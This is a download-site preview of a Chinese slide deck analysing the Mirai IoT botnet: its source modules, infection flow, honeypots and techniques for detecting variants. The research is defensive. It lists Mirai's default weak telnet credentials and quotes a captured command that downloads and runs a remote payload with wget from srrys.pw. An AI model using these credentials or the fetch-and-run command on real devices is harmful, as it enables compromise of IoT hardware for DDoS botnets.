Mirai僵尸网络课件.pptx
- 【下载声明】
1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
3. 本页资料《Mirai僵尸网络课件.pptx》由用户(ziliao2023)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- Mirai 僵尸 网络 课件
- 资源描述:
-
1、NOTE-mirai1ppt课件.IOT 僵尸网络严重威胁网络基础设施安全僵尸网络严重威胁网络基础设施安全典型的IoT-DDoS僵尸网络包括2013年出现的CCTV系列,肉鸡MM系列(chickenMM,数字系列10771、10991、25000、36000),BillGates,Mayday,PNScan,gafgyt等众多基于Linux的跨平台DDoS僵尸网络家族名称家族名称变种数量变种数量样本样本 HASH 数量数量TrojanDDoS/Linux.Mirai2大于大于 100TrojanDDoS/Linux.Xarcen5大于大于 1000TrojanDDoS/Linux.Znaich
2、3大于大于 500Trojan/Linux.PNScan2大于大于 50TrojanBackdoor/Linux.Mayday11大于大于 1000TrojanDDoS/Linux.DnsAmp5大于大于 500TrojanBackdoor/Linux.Ganiw5大于大于 3000TrojanBackdoor/Linux.Dofloo5大于大于 2000TrojanBackdoor/Linux.Gafgyt28大于大于 8000TrojanBackdoor/Linux.Tsunami71大于大于 1000Worm/Linux.Moose1大于大于 10WormNet/Linux.Darllo
3、z3大于大于 102ppt课件.IOT 僵尸网络严重威胁网络基础设施安全僵尸网络严重威胁网络基础设施安全Mirai等针对物联网设备DDoS入侵主要通过telnet端口进行流行密码档的暴力破解,或默认密码登陆,如果通过Telnet登陆成功,就尝试利用busybox等嵌入式必备的工具进行wget下载DDoS功能的bot,修改可执行属性,运行控制物联网设备。由于CPU指令架构的不同,在判断出系统架构后,一些僵尸网络可以选择MIPS、ARM,x86等架构的样本进行下载,运行后接收相关攻击指令进行攻击。弱密码示例如下:rootadminuserloginguestsupportoraclenetmano
4、peratorAdministratorciscotelnetdevicetechnetgeartoororaclenetgear1changemevizxv7ujMko0vizxvjuantechrealtekxmhdipchi3518Zte521zlxxsupervisorsmcadminsystemdreamboxmeinsmubntklv123ankoxc35111234maxided12345123456defaultpassvagrantklv1234jvbzd7ujMko0adminikwbpassowrd3ppt课件.IOT 僵尸网络严重威胁网络基础设施安全僵尸网络严重威胁网络
5、基础设施安全DVR,网络摄像头,智能路由器产品中部分存在弱密码的品牌4ppt课件.IOT 僵尸网络严重威胁网络基础设施安全僵尸网络严重威胁网络基础设施安全Mirai源码目录结构分析5ppt课件.IOT 僵尸网络严重威胁网络基础设施安全僵尸网络严重威胁网络基础设施安全Mirai源码主要包括两部分:1)loader:加载器,其中存放了针对各个平台编译后的可执行文件,用于加载Mirai的实际攻击程序2)Mirai:用于实施攻击的程序,分为bot(被控制端,使用C语言编写)和cnc(控制端,使用Go语言编写)两部分被控制端具有以下模块:模块文件名模块文件名模块作用模块作用attack.cattack.
6、c用于攻击的模块,所调用的攻击子模块在其他用于攻击的模块,所调用的攻击子模块在其他 attack_xxx.c attack_xxx.c 中定义中定义checksum.cchecksum.c用于计算校验码的模块用于计算校验码的模块killer.ckiller.c用于结束进程的模块用于结束进程的模块main.cmain.c用于调用其他子模块的主模块用于调用其他子模块的主模块rand.crand.c用于生成随机数的模块用于生成随机数的模块resolv.cresolv.c用于解析域名的模块用于解析域名的模块scanner.cscanner.c用于扫描的模块,可以扫描网络上可被攻击(如使用弱口令的设备)
7、用于扫描的模块,可以扫描网络上可被攻击(如使用弱口令的设备)table.ctable.c用于存放经过加密的域名数据的模块用于存放经过加密的域名数据的模块util.cutil.c用于提供一些使用工具的模块用于提供一些使用工具的模块6ppt课件.IOT 僵尸网络严重威胁网络基础设施安全僵尸网络严重威胁网络基础设施安全2014年之前使用Linux系统的IoT设备被植入恶意代码的方式主要是通过扫描弱密码,但在破壳漏洞(CVE-2014-6271)出现后,互联网上出现了大量利用该漏洞进行扫描并植入恶意代码的事件,针对Linux主机入侵的事件呈现全面上升的趋势。IoT僵尸网络的快速蔓延来自如下因素的组合:
8、1、随着小到智能家居、大到智慧城市的物联网蓬勃发展,在线IoT设备数量大幅增加;2、随着作为主流桌面操作系统的Windows的内存安全(如DEP、ASLR、SEHOP)等方面的能力不断强化,依托远程开放端口击穿Windows变得日趋困难,但对于普遍没有经过严格的安全设计的IoT设备的远程注入的成功率则高的多。3、IoT设备自身多数未嵌入安全机制,同时其又多半不在传统的IT网络之内,等于游离于安全感知能力之外,一旦遇到问题有的也不能有效响应。4、IoT设备往往更多24小时在线,是比桌面Windows更“稳定”的攻击源。7ppt课件.8ppt课件.Miraibotnet的演进的演进开放数据之Mir
9、aiscannerhttp:/ 最早发现、仍在活跃的传播区间(infection vector)10ppt课件.Miraibotnet的演进的演进我们的Telnet蜜罐我们基于hontel开发了一个定制的Telnet蜜罐Hontel:基于Linux chroot机制、使用Python开发的开源蜜罐https:/ fixingHooking shell command to prevent sample runningSimulating IoTdevices(e.g.,setting up fake/proc/cpuinfo)URL文件名枚举mirai.x86,mirai.arm,mirai.
10、m68k,mirai.mips,mirai.mpsl,11ppt课件.Miraibotnet的演进的演进针对tr-069/064的私有蜜罐2016/11,出现了针对TCP 7547/5555端口的扫描 cd/tmp;wgethttp:/srrys.pw/1;chmod 777 1;./1 “我们基于Python的bottle和paste库开发了一个基于HTTP的蜜罐关键在于接受HTTP POST请求,解析NewNTPServer1tag内的内容关键在于接受HTTP POST请求,解析NewNTPServer1tag内的内容12ppt课件.Miraibotnet的演进的演进如何检测如何检测Mir
11、ai变种?变种?检测变种的维度:检测变种的维度:变种意味着功能的变化,最终体现在代码上通常在2进制层面进行检测对于botnet,常常围绕C2来划分家族、追踪变种C2协议:消息格式和交互方式C2配置信息的格式和存储方式对于DDoS类型的botnet,攻击类型和具体攻击方式的变化也是划分变种的重要维度13ppt课件.Miraibotnet的演进的演进如何检测如何检测Mirai变种?变种?我们的检测维度我们的检测维度攻击类型syn_flood/http_flood/配置信息扫描端口最初的Mirai只扫描23/2323端口暴力破解用到的用户名和口令14ppt课件.Miraibotnet的演进的演进如何
12、检测如何检测Mirai变种?变种?-基于攻击类型检测变种基于攻击类型检测变种attack_init函数的几个特点支持11种攻击类型只用了10种每种攻击类型分配了一个010之间的指令码二进制的attack_init及其特征只有单个的指令块多数情况下,add_attack会被优化,-calloc and realloccalloc的参数固定为1和8-对于M68K cpu为1和6攻击方法及其指令码存放在calloced的缓冲中位移分别是1和415ppt课件.Miraibotnet的演进的演进如何检测如何检测Mirai变种?变种?-基于配置信息检测变种基于配置信息检测变种关于Mirai的配置信息这里的
13、配置信息包括:-C2/report servers-扫描和攻击参数-其它运行时参数Mirai配置信息做了加密处理,只有用到时才解密密文的初始化在一个名为table_init的函数中完成2进制的table_init函数及其特征只包含单一的大语句块-通常多于500条指令多数情况下add_entry被内联(inline)优化,只看到malloc和util_memcpy密文的地址和大小作为参数2/3传给util_memcpy配置信息和变种不同样本的配置信息差别较大:条目不同内容不同这种差别通常意味着变种的存在通过简单的聚类技术即可快速关联同种变种的样本16ppt课件.Miraibotnet的演进的演进
14、如何检测如何检测Mirai变种?变种?-基于扫描行为检测变种基于扫描行为检测变种Mirai的扫描模块Mirai使用了自定义的算法来生成扫描的SYN包缺省扫描23/2323端口同时安装一批用户名和口令用于后续的telnet暴力破解缺省安装了62对用户名和口令上述工作在一个名为scanner_init的函数中完成由一个fork()出来的进程单独执行The scanner_initfunction扫描端口硬编码左图中为0 x17用户名和口令调用add_auth_entry初始化到内存中反复调用变种2:扫描7547端口17ppt课件.Miraibotnet的演进的演进典型变种分析典型变种分析-DGA变
15、种变种出现于去年11月下旬,能通过TCP 7547传播“Now MiraiHas DGA Feature Built in”“New MiraiDGA Seed 0 x91 Brute Forced”在C2方面具有较强的冗余性考虑除了DGA,后续又出现了采用IPGA和硬编码C2 IP的方式部分样本使用了非8.8.8.8的DNS resolver样本本身包含了exploit,不同于缺省的Mirai传播方式更类似于更早的gafgyt18ppt课件.Miraibotnet的演进的演进典型变种分析典型变种分析-一个支持多种伪一个支持多种伪HTTP agent的变种的变种缺省的9个伪HTTP agent
16、Mozilla/5.0(Windows NT 10.0;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/51.0.2704.103 Safari/537.36Mozilla/5.0(Windows NT 10.0;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/51.0.2704.103 Safari/537.36Mozilla/5.0(Windows NT 10.0;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/52.0.2743.116 S
17、afari/537.36Mozilla/5.0(Windows NT 10.0;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/52.0.2743.116 Safari/537.36Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/51.0.2704.103 Safari/537.36Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/51.0.
18、2704.103 Safari/537.36Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/52.0.2743.116 Safari/537.36Mozilla/5.0(Windows NT 6.1;WOW64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/52.0.2743.116 Safari/537.36Mozilla/5.0(Macintosh;Intel Mac OS X 10_11_6)AppleWebKit/601.7.7(KHTML,l
19、ike Gecko)Version/9.1.2 Safari/601.7.719ppt课件.Miraibotnet的演进的演进典型变种分析典型变种分析-一个支持多种伪一个支持多种伪HTTP agent的变种的变种cluster_1中约110个agent信息Mozilla/4.0(compatible;MSIE 8.0;Windows NT 5.1;Trident/4.0;GTB7.0)Mozilla/5.0(Windows NT 6.1)AppleWebKit/537.36(KHTML,like Gecko)Chrome/38.0.2125.122 Safari/537.36 SE 2.X M
20、etaSr1.0Mozilla/5.0(Windows NT 6.1)AppleWebKit/537.36(KHTML,like Gecko)Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr1.0Mozilla/4.0(compatible;MSIE 7.0;Windows NT 5.2;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET4.0E;.NET CLR 3.0.4506.2152;.NET CLR 3.5.30729;.NET4.0C)Mozilla/4.0(compatible;MSIE 7.0;Wi
21、ndows NT 5.2;.NET CLR 1.1.4322;.NET CLR 2.0.50727;.NET4.0E;.NET CLR 3.0.4506.2152;.NET CLR 3.5.30729;.NET4.0C)Mozilla/5.0(Windows;U;Windows NT 5.1;zh-CN;rv:1.9b4)Gecko/2008030317 Firefox/3.0b4Mozilla/5.0(Windows;U;Windows NT 5.1;zh-CN;rv:1.9b4)Gecko/2008030317 Firefox/3.0b4Mozilla/5.0(Windows;U;MSIE
22、 6.0;Windows NT 5.1;SV1;.NET CLR 2.0.50727;BIDUBrowser8.7)(省略若干)20ppt课件.Miraibotnet的演进的演进典型变种分析典型变种分析-一个支持多种伪一个支持多种伪HTTP agent的变种的变种关于这个变种的其他信息相对cluster_1,cluster_2又添加了约60个新HTTP agent该变种扫描23端口只支持缺省的攻击类型0_1_2_3_4_5_6_7_9_10 该变种只是增强了该变种只是增强了HTTPflood攻击能力攻击能力21ppt课件.Miraibotnet的演进的演进典型变种分析典型变种分析-SSH sc
23、anner 变种变种该变种的一些汇总样本中存在扫描22和23端口的代码只保留了Mirai的扫描功能未发现C2通信和DDoS攻击代码去年12月初出现,目前仍在活跃这是一个具有较强这是一个具有较强SSH扫描能力的扫描专用变种!扫描能力的扫描专用变种!22ppt课件.Mirai代码及原理分析代码及原理分析 Mirai事件回顾事件回顾23ppt课件.Mirai代码及原理分析代码及原理分析 功能模块功能模块 dlr:肉鸡上运行的引导程序,编译生成各种平台的二进制文件,如 dlr.arm,dlr.ppc等。主要功能类似grub,下载mirai主程序 loader:加载器,运行在黑客电脑上,登陆爆破的肉鸡设
24、备,使其感染 bot:真正的病毒,编译生成各种平台的二进制文件,如mirai.arm,mirai.ppc等,主要功能为telnet弱密码扫描、DDoS攻击cnc:Go语言开发的肉鸡控制程序,运行在黑客电脑上。主要功能为接收黑客指令,控制肉鸡发起DDoS tools:几个单独的工具,黑客自己使用。包括wget,禁止mirai被gdb,数据加解密,接受爆破的telnet用户名密码等 24ppt课件.Mirai代码及原理分析代码及原理分析 感染流程感染流程 25ppt课件.Mirai代码及原理分析代码及原理分析 代码分析代码分析:loader1.每个处理器启动一个网络事件后台线程2.从stdin读取
25、成功爆破的肉鸡信息,格式为:10.1.1.1:80 root:1234563.尝试telnet连接肉鸡,注册网络事件,并以负载均衡方式丢给后台线程处理4.后台线程实现了完整的telnet过程5.登陆成功后获取肉鸡的平台类型,并尝试在肉鸡上下载平台对应的mirai程序根据肉鸡的运行环境,尝试通过以下三种方式下载:从文件服务器wget(/bin/busybox wget)从文件服务器tftp(/bin/busybox tftp)将dlr引导程序echo到肉鸡运行,在引导程序中http get 下载并运行成功后,删除文件自身.26ppt课件.Mirai代码及原理分析代码及原理分析 代码分析代码分析:
展开阅读全文